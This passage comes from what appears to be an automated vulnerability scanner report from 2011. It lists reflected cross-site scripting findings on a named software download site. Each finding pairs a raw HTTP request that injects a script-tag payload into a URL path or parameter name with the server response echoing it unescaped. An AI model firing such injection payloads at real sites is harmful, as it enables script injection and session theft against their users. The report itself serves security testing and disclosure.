The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b3f8"><script>alert(1)</script>275bf41d948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948"/>
...[SNIP]...

1.303. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f529"><script>alert(1)</script>0751029a53e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1"/>
...[SNIP]...

1.304. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52513"><script>alert(1)</script>afca5fe7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html" />
...[SNIP]...

1.305. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>33bac6575a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4"/>
...[SNIP]...

1.306. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f66"><script>alert(1)</script>7df9bf07e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1"/>
...[SNIP]...

1.307. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9633"><script>alert(1)</script>8efe63aeaeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html" />
...[SNIP]...

1.308. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e97"><script>alert(1)</script>f344c05b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142"/>
...[SNIP]...

1.309. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa475"><script>alert(1)</script>9b2f637b814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html?aa475"><script>alert(1)</script>9b2f637b814=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

1.310. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71c6"><script>alert(1)</script>a82c103a4fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html" />
...[SNIP]...

1.311. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b8"><script>alert(1)</script>79d2914fb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55"/>
...[SNIP]...

1.312. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89e3"><script>alert(1)</script>4467668b615 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1"/>
...[SNIP]...

1.313. http://www.x64bitdownload.com/drivers/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd51"><script>alert(1)</script>917ba9ab7e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers5cd51"><script>alert(1)</script>917ba9ab7e5/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers5cd51"><script>alert(1)</script>917ba9ab7e5/" />
...[SNIP]...

1.314. http://www.x64bitdownload.com/drivers/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a41"><script>alert(1)</script>03ddb5827b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1" />
...[SNIP]...

1.315. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b223c"><script>alert(1)</script>5bbc5b84076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html" />
...[SNIP]...

1.316. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b85"><script>alert(1)</script>04e93731252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252" />
...[SNIP]...

1.317. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a8f2"><script>alert(1)</script>1e0be29bacc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1" />
...[SNIP]...

1.318. http://www.x64bitdownload.com/featured-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288dc"><script>alert(1)</script>a9da18bcc18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html288dc"><script>alert(1)</script>a9da18bcc18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html288dc"><script>alert(1)</script>a9da18bcc18" />
...[SNIP]...

1.319. http://www.x64bitdownload.com/featured-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0316"><script>alert(1)</script>cac9cd247c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:44 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
